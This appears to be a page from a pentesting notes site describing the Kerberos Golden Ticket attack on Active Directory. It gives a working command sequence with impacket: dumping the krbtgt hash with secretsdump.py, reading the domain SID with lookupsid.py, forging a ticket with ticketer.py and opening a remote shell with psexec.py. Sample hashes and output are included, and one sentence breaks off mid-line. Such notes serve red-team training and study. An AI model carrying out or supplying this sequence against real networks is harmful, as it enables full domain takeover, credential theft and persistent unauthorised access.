Golden Ticket

Complete Domain Compromise with a Golden Ticket Attackblog.netwrix.com

Using mimikatz

Mimikatz | Cheat Sheet Hackinglanzt.gitbook.io

Using impacket tools

Golden Ticket Attack Explained - MITRE ATT&CK T1558.001Picus Security

Extract the krbtgt NTLM hash

secretsdump.py Administrator:<PASSWORD>@10.10.100.200

[...]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5508500012cc005cf7082a9a89ebdfdf:::
[...]

Extract SID of Domain

lookupsid.py CONTROLLER.local/Administrator:<PASSWORD>@10.10.100.200

[...]
[*] Domain SID is: S-1-5-21-849420856-2351964222-986696166
[...]

Generating Golden Ticket

Using the krbtgt NTLM hash, the Domain SID, the Domain Name and a

ticketer.py -nthash "5508500012cc005cf7082a9a89ebdfdf" -domain-sid "S-1-5-21-849420856-2351964222-986696166" -domain "CONTROLLER.local" NonExistentUserBla

Using ticket

export KRB5CCNAME=$(pwd)/Administrator.ccache
psexec.py CONTROLLER.local/Administrator@10.10.100.212 -k -no-pass

PreviousASREP-Roast VS Kerberoasting NextResource Based Constrained Delegation

Last updated 1 year ago

hashtagUsing mimikatz

hashtagUsing impacket tools

hashtagExtract the krbtgt NTLM hash

hashtagExtract SID of Domain

hashtagGenerating Golden Ticket

hashtagUsing ticket

Using mimikatz

Using impacket tools

Extract the krbtgt NTLM hash

Extract SID of Domain

Generating Golden Ticket

Using ticket